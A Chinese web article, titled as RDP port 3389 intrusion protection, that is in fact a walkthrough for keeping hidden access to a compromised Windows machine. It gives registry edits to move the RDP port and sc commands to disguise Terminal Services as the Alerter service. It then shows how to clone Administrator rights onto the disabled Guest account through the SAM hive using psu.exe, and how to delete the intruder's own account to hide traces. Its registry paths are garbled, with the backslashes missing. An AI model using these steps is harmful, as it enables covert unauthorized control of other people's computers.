windows 3389 端口入侵防护( 二 )

【windows 3389 端口入侵防护】[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp],PortNumber值,默认是3389,选择10进制,修改成所希望的端口,比如1314 。
第二个地方:
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp] PortNumber值,默认是3389,选择10进制,修改成所希望的端口,比如1314 。
要重启系统才能用新端口连 。(不急..改了他的服务名再重启系统吧)
导出3389服务的
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermService]
的键值为mm.reg文件 。编辑mm.reg文件,替换TermService为Alerter(错误警告服务..别的服务也行)。再把第十行的"Description"="(这里是服务说明,改为你所换的服务说明,这里改为通知所选用户和计算机有关系统管理级警报 。)"第十一行的"DisplayName"="(这里是服务名称,改为你所换的服务名称,这里改为Alerter) 。保存,再导入注册表(这里要先运行Services.msc(可在CMD下打这命令)服务管理器..把Alerter的服务先停止) 。
再在CMD下
CD c:winnt
system32 copy termsrv.exe service.exe
(这里是复制termsrv.exe为Alerter服务文件名差不多的文件)
CD C:winnt sc 127.0.0.1 config Alerter binpath=
c:winntsystem32service.exe
(这里是从新定向Alerter服务文件.服务名一定要区分大小写A要大写)
九.注消后(注消比直接关要好些)用Radmin重启肉鸡
十.使用被禁用的帐户[Guest]登陆,删除自己开始建的帐号
1.使用psu.exe展开注册表到
HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers
用法:[psu -p regedit -i pid]
Pid 的值为在任务栏空白处点右键-->>任务管理器--->>进程中的winlogon.exe后面的数值就是PID数值 。
如:psu –p regedit –i 157
将Guest克成管理员权限,克成管理员权限的方法:
找到HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNamesAdministrator的类型值 。
在HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers下找到这个类型值在复制数值名为F的数值数剧覆盖相应的Guest的类型值(找的方法一样) 。
导出Guest的配置(也就是导出HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersGuest和他相应的类型值的数据),然后删除Guest的配置 。
2.查看计算机管理中帐户列表,刷新这时候会出现错误[找不到帐户](跳过这步也行) 。
3.将Guest的配置(二个REG文件导进注册表) 。
4.修改Guest帐户密码,命令行下禁用Guest帐户[一定是命令行下] 。

net user Guest ****
[修改密码]net user Guest /
active:yesnet user Guest /active:no[命令行下禁用Guest]

5.实验被禁止的帐户Guest是否可用 。
6.用Guest登陆后删除自己建的帐号 。

推荐阅读